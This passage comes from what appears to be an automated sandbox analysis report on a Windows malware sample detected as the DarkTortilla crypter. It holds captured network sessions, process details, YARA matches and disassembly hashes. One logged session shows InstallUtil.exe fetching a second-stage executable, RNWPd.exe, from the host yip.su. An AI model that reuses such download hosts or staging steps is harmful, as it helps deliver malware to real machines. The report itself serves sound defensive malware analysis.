69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-08-11 09:23:05 UTC	1369	IN	Data Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72 Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
2024-08-11 09:23:05 UTC	1369	IN	Data Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
2024-08-11 09:23:05 UTC	529	IN	Data Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76 Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
2024-08-11 09:23:05 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.7	49740	188.114.97.3	443	7628	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-11 09:23:06 UTC	65	OUT	GET /RNWPd.exe HTTP/1.1 Host: yip.su Connection: Keep-Alive
2024-08-11 09:23:06 UTC	1285	IN	HTTP/1.1 403 Forbidden Date: Sun, 11 Aug 2024 09:23:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Opener-Policy: same-origin Cross-Origin-Resource-Policy: same-origin Origin-Agent-Cluster: ?1 Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=() Referrer-Policy: same-origin X-Content-Options: nosniff X-Frame-Options: SAMEORIGIN cf-mitigated: challenge
2024-08-11 09:23:06 UTC	689	IN	Data Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 69 65 48 6c 74 43 46 55 7a 47 7a 41 54 37 52 59 33 2b 45 66 6d 41 6f 64 66 35 72 61 4c 50 52 32 6a 41 69 4c 4d 70 38 59 6b 61 77 66 56 6d 77 44 75 2f 64 48 70 33 4a 50 44 31 47 77 43 6f 30 34 55 6e 71 6f 71 65 5a 2f 35 44 6a 6b 7a 6f 5a 4e 59 75 33 72 54 5a 78 54 42 6e 59 4b 41 45 4a 49 4b 41 67 6e 4f 62 68 66 55 38 6f 3d 24 6e 7a 59 4b 4f 49 57 73 68 53 62 71 38 71 62 71 4b 4a 54 76 69 77 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20 Data Ascii: cf-chl-out: ieHltCFUzGzAT7RY3+EfmAodf5raLPR2jAiLMp8YkawfVmwDu/dHp3JPD1GwCo04UnqoqeZ/5DjkzoZNYu3rTZxTBnYKAEJIKAgnObhfU8o=$nzYKOIWshSbq8qbqKJTviw==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
2024-08-11 09:23:06 UTC	1369	IN	Data Raw: 33 62 66 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d Data Ascii: 3bfc<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
2024-08-11 09:23:06 UTC	1369	IN	Data Raw: 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 2b 50 48 42 68 64 47 67 67 5a 6d 6c 73 62 44 30 69 49 30 49 79 4d 45 59 77 4d 79 49 67 5a 44 30 69 54 54 45 32 49 44 4e 68 4d 54 4d 67 4d 54 4d 67 4d 43 41 78 49 44 41 67 4d Data Ascii: 0xLjQwNXoiLz48L3N2Zz4=)}body #challenge-error-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSI+PHBhdGggZmlsbD0iI0IyMEYwMyIgZD0iTTE2IDNhMTMgMTMgMCAxIDAgM
2024-08-11 09:23:06 UTC	1369	IN	Data Raw: 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41 35 4c 6a 51 35 4e 53 30 35 4c 6a 59 74 4d 53 34 30 4d 69 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 2e 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 Data Ascii: DEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA5LjQ5NS05LjYtMS40Mi0xLjQwNXoiLz48L3N2Zz4=)}body.dark #challenge-error-text{background
2024-08-11 09:23:06 UTC	1369	IN	Data Raw: 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41 Data Ascii: eD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA
2024-08-11 09:23:06 UTC	1369	IN	Data Raw: 70 70 65 72 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 3a 31 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 62 32 30 66 30 33 7d 2e 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 32 72 65 6d 20 30 7d 2e 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 2e 37 35 72 65 6d 7d 2e 68 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 7d 2e 63 6f 72 65 2d 6d 73 67 2c 2e 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 32 35 72 65 6d 7d 2e 62 6f 64 79 2d 74 65 78 74 2c 2e 63 6f 72 Data Ascii: pper{align-items:center;display:flex;flex:1;flex-direction:column}.font-red{color:#b20f03}.spacer{margin:2rem 0}.h1{font-size:2.5rem;font-weight:500;line-height:3.75rem}.h2{font-weight:500}.core-msg,.h2{font-size:1.5rem;line-height:2.25rem}.body-text,.cor
2024-08-11 09:23:06 UTC	1369	IN	Data Raw: 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e Data Ascii: IgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuN
2024-08-11 09:23:06 UTC	1369	IN	Data Raw: 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6c 75 6d 6e 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 20 2e 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 61 75 74 6f 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 6b 65 65 70 2d 61 6c 6c 7d 2e 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 7d 2e 6c 6f 61 64 69 6e 67 2d 73 70 69 6e 6e 65 72 7b 68 65 69 67 68 74 3a 37 36 2e 33 39 31 70 78 7d 2e 6c 64 73 2d 72 69 6e 67 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6c 64 73 2d 72 69 6e 67 2c 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 68 65 69 Data Ascii: ign:center}.column{padding-bottom:2rem}.clearfix .column{float:none;padding:0;width:auto;word-break:keep-all}.zone-name-title{margin-bottom:1rem}}.loading-spinner{height:76.391px}.lds-ring{display:inline-block;position:relative}.lds-ring,.lds-ring div{hei
2024-08-11 09:23:06 UTC	1369	IN	Data Raw: 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 76 49 64 3a 20 27 33 27 2c 63 5a 6f 6e 65 3a 20 22 79 69 70 2e 73 75 22 2c 63 54 79 70 65 3a 20 27 6d 61 6e 61 67 65 64 27 2c 63 4e 6f 75 6e 63 65 3a 20 27 35 37 34 32 36 27 2c 63 52 61 79 3a 20 27 38 62 31 37 32 61 33 65 32 65 30 35 34 33 62 65 27 2c 63 48 61 73 68 3a 20 27 62 62 33 32 66 38 61 62 33 30 65 61 36 38 62 27 2c 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 52 4e 57 50 64 2e 65 78 65 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 63 33 6c 70 69 4a 53 6a 4e 45 5f 69 49 58 33 55 57 62 6b 34 65 57 39 4b 55 5a 31 6e 66 77 67 7a 70 56 46 46 66 65 77 36 2e 4a 51 2d 31 37 32 33 33 36 38 31 38 36 2d 30 2e 30 2e 31 2e 31 2d 33 36 32 35 22 2c 63 46 50 57 76 3a 20 27 67 27 2c 63 54 54 69 6d Data Ascii: ion(){window._cf_chl_opt={cvId: '3',cZone: "yip.su",cType: 'managed',cNounce: '57426',cRay: '8b172a3e2e0543be',cHash: 'bb32f8ab30ea68b',cUPMDTk: "\/RNWPd.exe?__cf_chl_tk=c3lpiJSjNE_iIX3UWbk4eW9KUZ1nfwgzpVFFfew6.JQ-1723368186-0.0.1.1-3625",cFPWv: 'g',cTTim
2024-08-11 09:23:06 UTC	1369	IN	Data Raw: 30 67 57 37 77 51 4c 46 71 6a 72 67 37 64 64 4b 2e 56 36 4f 78 71 65 47 32 71 74 6a 62 4a 7a 74 6a 57 64 52 74 59 39 76 72 46 68 4a 53 71 74 6d 50 45 30 52 76 4d 39 4d 37 55 4e 78 6b 56 41 6b 46 64 41 57 43 63 73 68 72 66 64 4a 6d 34 64 6d 5a 4b 4d 62 72 74 70 74 56 66 34 72 5f 71 71 42 57 6f 45 45 51 7a 43 59 36 70 52 49 41 4a 45 6c 77 6a 74 5a 49 55 54 4f 58 65 48 52 76 5a 65 6b 4f 68 66 6b 2e 50 45 41 68 70 5f 4d 61 67 6f 71 75 4b 39 66 36 52 70 46 50 6e 4d 37 34 66 51 38 41 49 37 41 62 38 79 30 62 4f 70 35 4e 55 78 66 6e 44 77 5a 31 74 70 37 70 34 45 70 62 76 4f 6a 53 6b 4f 78 52 68 50 47 5f 6f 74 7a 35 78 4f 51 58 72 30 74 6a 6e 48 71 39 57 47 65 33 62 71 73 30 73 37 7a 44 66 75 34 35 73 4a 66 68 7a 45 30 31 56 4c 6b 42 66 64 36 79 44 2e 47 48 5a 45 Data Ascii: 0gW7wQLFqjrg7ddK.V6OxqeG2qtjbJztjWdRtY9vrFhJSqtmPE0RvM9M7UNxkVAkFdAWCcshrfdJm4dmZKMbrtptVf4r_qqBWoEEQzCY6pRIAJElwjtZIUTOXeHRvZekOhfk.PEAhp_MagoquK9f6RpFPnM74fQ8AI7Ab8y0bOp5NUxfnDwZ1tp7p4EpbvOjSkOxRhPG_otz5xOQXr0tjnHq9WGe3bqs0s7zDfu45sJfhzE01VLkBfd6yD.GHZE

Target ID:	0
Start time:	05:21:05
Start date:	11/08/2024
Path:	C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe"
Imagebase:	0x1d0000
File size:	1'067'008 bytes
MD5 hash:	D8AF2FCAB18BCB456063134E43294027
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.1622766007.0000000006150000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.1614555856.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	05:21:09
Start date:	11/08/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Imagebase:	0x20000
File size:	42'064 bytes
MD5 hash:	5D4073B2EB6D217C19F2B22F21BF8D57
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	22.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	8.9%
Total number of Nodes:	225
Total number of Limit Nodes:	19

Executed Functions

Function 011B8158 Relevance: 12.2, Strings: 9, Instructions: 979COMMON

Download Yara Rule

Strings

(oq, xrefs: 011B87D1
(oq, xrefs: 011B82F9
,q, xrefs: 011B86A2
,q, xrefs: 011B86B2
(oq, xrefs: 011B823E
(oq, xrefs: 011B8711
(oq, xrefs: 011B83C2
(oq, xrefs: 011B8721
(oq, xrefs: 011B8325

Memory Dump Source

Source File: 00000000.00000002.1613424993.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_11b0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: (oq$(oq$(oq$(oq$(oq$(oq$(oq$,q$,q
API String ID: 0-746337618
Opcode ID: 8c1971d3408bef3592bd476ae02d7efdb2060a4498031982dcfca6557bf575b8
Instruction ID: abb7294684211b7a52a3a44038755507248af60e8376b406fb830c4aa72a04d7
Opcode Fuzzy Hash: 8c1971d3408bef3592bd476ae02d7efdb2060a4498031982dcfca6557bf575b8
Instruction Fuzzy Hash: 21925934A00209DFDB29CF68D9C4AEEBBFABF89714F158559E4199B2A1C730EC41CB51

Function 011B7278 Relevance: 11.2, Strings: 8, Instructions: 1220COMMON

Download Yara Rule

Strings

(oq, xrefs: 011B7DB2
Hq, xrefs: 011B7946
,q, xrefs: 011B7E2A
(oq, xrefs: 011B7A7A
,q, xrefs: 011B7358
,q, xrefs: 011B734E
(oq, xrefs: 011B7DC0
,q, xrefs: 011B7E38

Memory Dump Source

Source File: 00000000.00000002.1613424993.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_11b0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: (oq$(oq$(oq$,q$,q$,q$,q$Hq
API String ID: 0-3331155789
Opcode ID: 8aa252f794abf55a2a4dd43c87ec0bdf78d095cc38909571740652cefc1442b7
Instruction ID: 89d7a0abab182aa03630c67d85b2b07027b9f6c8acbaa91ca8d4438aec1dec52
Opcode Fuzzy Hash: 8aa252f794abf55a2a4dd43c87ec0bdf78d095cc38909571740652cefc1442b7
Instruction Fuzzy Hash: BEA26B70A002198FDB19DF69C884AEEBBB6BF89310F158569E915EB3E1DB30DC41CB51

Function 063B8320 Relevance: 11.0, Strings: 8, Instructions: 954
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hq, xrefs: 063BBBDA
PHq, xrefs: 063BB909
Hq, xrefs: 063BBC39
Hq, xrefs: 063BBDF8
Hq, xrefs: 063BBFFC
Hq, xrefs: 063BC05B
(q, xrefs: 063BB935
Hq, xrefs: 063BC21A

Memory Dump Source

Source File: 00000000.00000002.1624199795.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_63b0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: (q$Hq$Hq$Hq$Hq$Hq$Hq$PHq
API String ID: 0-4026645983
Opcode ID: 442ed4bbc11b337567cdcd23a427ea14c57664fd955f4b057fc575dc90696da8
Instruction ID: f6e533d31310b186d42d45680bc460dc99cb7930a5ae6a1a48ee2123bf704e5a
Opcode Fuzzy Hash: 442ed4bbc11b337567cdcd23a427ea14c57664fd955f4b057fc575dc90696da8
Instruction Fuzzy Hash: EC62C130B002158FDB58EB38C8547AEBBA6BFC9310F249569D55ADB3A4CE35DC06C7A1

Function 06B00040 Relevance: 5.5, Instructions: 5545
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1625235622.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b00000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9157c485f93ca86b85e759b4fdba312ea41f9e736bd119567052008bdc076797
Instruction ID: 40c7979d734a1863d5eb6967a8035b9fda1732f114e018f454db12530c5b26d8
Opcode Fuzzy Hash: 9157c485f93ca86b85e759b4fdba312ea41f9e736bd119567052008bdc076797
Instruction Fuzzy Hash: EAB308B0A01228CBDB68FF39D99965CBBF2BB99300F0085E9D449A7354DB749E94CF41

Function 06B0003F Relevance: 5.5, Instructions: 5543
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1625235622.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b00000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66d9478545be477e44fc1bf13cf81c388d274d4ef155bdc17b967614e18374cb
Instruction ID: d2dc88d3cb5c91283c75d1c1a05f2d3717817cd84dd72d12781aa3841a4f325e
Opcode Fuzzy Hash: 66d9478545be477e44fc1bf13cf81c388d274d4ef155bdc17b967614e18374cb
